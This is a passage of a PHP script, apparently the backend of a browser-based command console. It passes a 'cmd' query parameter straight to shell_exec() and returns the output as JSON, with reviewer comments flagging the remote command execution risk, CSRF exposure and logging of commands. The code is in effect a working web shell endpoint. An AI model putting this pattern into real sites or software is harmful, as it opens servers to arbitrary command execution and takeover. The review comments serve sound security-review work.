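Please login before continuing!"); exit; }

// SECURITY NOTE (review): the "cmd" request parameter is passed to shell_exec(),
// so any request that gets past the login check above can run arbitrary
// commands as the web-server user. That check is the only access control
// visible here and its condition is outside this excerpt - confirm it cannot
// be bypassed and that it is restricted to administrators.
// Because the command arrives in a GET query string it is also exposed to
// cross-site request forgery and ends up in access logs, proxy logs and
// browser history. Moving to POST with a per-session CSRF token (and an
// allowlist of permitted commands where the use case allows) needs matching
// client changes, so it is flagged here rather than changed.
if (isset($_GET["cmd"])) {
    // HTTP GET requests
    // PHP turns "cmd[]=..." / "msg[]=..." into arrays; shell_exec() and
    // htmlentities() only accept strings, so non-string values are treated
    // as absent instead of raising a TypeError.
    $cmd = is_string($_GET["cmd"]) ? $_GET["cmd"] : "";
    $msg = (isset($_GET["msg"]) && is_string($_GET["msg"])) ? $_GET["msg"] : "";
    $ret = "";

    if ($cmd === "ostype") {
        // Built-in pseudo command: report the server OS without spawning a shell
        $ret = strtolower(PHP_OS);
    } elseif ($cmd !== "") {
        $ret = shell_exec($cmd);
    }

    // shell_exec() yields null/false when the command fails or prints nothing;
    // normalise to a string so htmlentities() is never handed null (deprecated
    // since PHP 8.1, and the notice would corrupt the JSON body).
    if (!is_string($ret)) {
        $ret = "";
    }

    // Remove any HTML that could be used for XSS attacks.
    // ENT_SUBSTITUTE keeps output containing invalid UTF-8 (replaced with
    // U+FFFD) instead of htmlentities() discarding the whole string.
    $ret = htmlentities($ret, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    $msg = htmlentities($msg, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');

    // NOTE(review): no Content-Type header is set in this excerpt; unless one is
    // set elsewhere the JSON goes out with PHP's default type, and the entity
    // encoding above is what keeps the echoed values inert if a browser renders
    // the response as HTML. Verify how the client parses the body before
    // switching to application/json.
    echo json_encode(array("rsp" => $ret, "msg" => $msg));
}
?>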